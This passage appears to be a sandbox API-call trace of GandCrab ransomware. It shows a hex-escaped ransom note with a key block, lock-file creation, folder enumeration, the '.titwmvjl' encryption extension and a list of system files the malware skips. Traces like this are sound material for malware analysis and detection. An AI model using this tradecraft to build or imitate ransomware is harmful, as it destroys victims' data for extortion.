2\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0073.344] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0073.345] CloseHandle (hObject=0x2bc) returned 1 [0073.345] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.346] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.346] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x12, wMilliseconds=0x28c)) [0073.346] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.346] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0073.347] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0073.347] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\d2ca4a09d2ca4deb61a.lock") returned 79 [0073.347] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\speech\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0073.348] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.348] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.348] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\") returned 55 [0073.348] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\*" [0073.348] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5036f8 [0073.348] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.348] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.349] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.349] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.349] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.349] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0073.349] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0073.349] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\d2ca4a09d2ca4deb61a.lock" [0073.349] lstrlenW (lpString=".titwmvjl") returned 9 [0073.349] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\d2ca4a09d2ca4deb61a.lock") returned 79 [0073.349] VirtualAlloc (lpAddress=0x0, dwSize=0xde, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.350] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 88 [0073.350] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\d2ca4a09d2ca4deb61a.lock") returned 79 [0073.350] lstrlenW (lpString=".lock") returned 5 [0073.350] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.350] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0073.350] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.350] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.351] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.351] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0073.351] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0073.351] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\TITWMVJL-DECRYPT.txt" [0073.351] lstrlenW (lpString=".titwmvjl") returned 9 [0073.351] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\TITWMVJL-DECRYPT.txt") returned 75 [0073.351] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.351] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 84 [0073.351] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\TITWMVJL-DECRYPT.txt") returned 75 [0073.351] lstrlenW (lpString=".txt") returned 4 [0073.351] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.351] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0073.351] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0073.351] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.352] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\TITWMVJL-DECRYPT.txt") returned 75 [0073.352] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\TITWMVJL-DECRYPT.txt") returned 75 [0073.352] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0073.352] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0073.352] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0073.352] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0073.352] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0073.352] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0073.352] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0073.352] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0073.352] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.352] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0073.352] FindClose (in: hFindFile=0x5036f8 | out: hFindFile=0x5036f8) returned 1 [0073.352] CloseHandle (hObject=0x2bc) returned 1 [0073.353] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0073.353] lstrcmpW (lpString1="SystemCertificates", lpString2=".") returned 1 [0073.353] lstrcmpW (lpString1="SystemCertificates", lpString2="..") returned 1 [0073.353] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="SystemCertificates" | out: 